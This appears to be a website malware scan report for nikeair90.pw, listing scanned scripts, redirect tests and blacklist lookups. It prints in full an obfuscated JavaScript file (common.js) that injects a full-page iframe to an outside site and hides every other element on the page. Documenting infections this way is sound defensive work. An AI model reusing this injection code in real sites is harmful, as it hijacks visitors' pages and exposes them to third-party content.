Scanned pages/files
| Request | Server response | Status |
http://nikeair90.pw/content/ | 200 OK Content-Length: 35091 Content-Type: text/html | clean |
http://nikeair90.pw/style2/js/jquery.js | 200 OK Content-Length: 72174 Content-Type: application/javascript | clean |
http://nikeair90.pw/style2/js/focus.js | 200 OK Content-Length: 2740 Content-Type: application/javascript | clean |
http://nikeair90.pw/style2/js/navpiaofu.js | 200 OK Content-Length: 1262 Content-Type: application/javascript | clean |
http://nikeair90.pw/style2/js/uaredirect.js | 200 OK Content-Length: 819 Content-Type: application/javascript | clean |
http://nikeair90.pw/common.js | 200 OK Content-Length: 766 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var ss = '<center id="showcloneshengxiaon"><ifr'+'ame scrolling="no" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="14'+'00" height="35'+'30" src="http://www.stagetw.com/"></iframe></center>';
eval("do"+"cu"+"ment.wr"+"ite('"+ss+"');"); try{ setInterval(function(){ try{ document.getElementById("div"+"All").style.display="no"+"ne"; }catch(e){} for(var i=0;i<document.body.children.length;i++){ try{ var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id; if(myid!="iconDiv1" && myid!="showcloneshengxiaon"){ document.body.children[i].style.display="non"+"e"; } }catch(e){} } },3000); }catch(e){} Antivirus reports:
| ||
http://js.users.51.la/4288402.js | 200 OK Content-Length: 1944 Content-Type: application/x-javascript | clean |
http://js.users.51.la/16931900.js | 200 OK Content-Length: 1980 Content-Type: application/x-javascript | clean |
http://nikeair90.pw/ | 200 OK Content-Length: 35468 Content-Type: text/html | clean |
http://nikeair90.pw/rss.php | 200 OK Content-Length: 56327 Content-Type: text/html | clean |
http://nikeair90.pw/style2/js/logger.js | 200 OK Content-Length: 5881 Content-Type: application/javascript | clean |
http://nikeair90.pw/style2/js/bdshare.js | 200 OK Content-Length: 1132 Content-Type: application/javascript | clean |
http://nikeair90.pw/style2/js/bds_s_v2.js | 200 OK Content-Length: 26180 Content-Type: application/javascript | clean |
http://nikeair90.pw/style2/js/new.js | 200 OK Content-Length: 1453 Content-Type: application/javascript | clean |
http://nikeair90.pw/news/31203.html | 200 OK Content-Length: 35169 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nikeair90.pw
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 11 Jun 2014 15:46:47 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.3.27
GET / HTTP/1.1
Host: nikeair90.pw
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 11 Jun 2014 15:46:47 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: nikeair90.pw
Referer: http://www.google.com/search?q=nikeair90.pw
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: nikeair90.pw
Referer: http://www.google.com/search?q=nikeair90.pw
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nikeair90.pw
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://nikeair90.pw/
Result: nikeair90.pw is not infected or malware details are not published yet.
Result: nikeair90.pw is not infected or malware details are not published yet.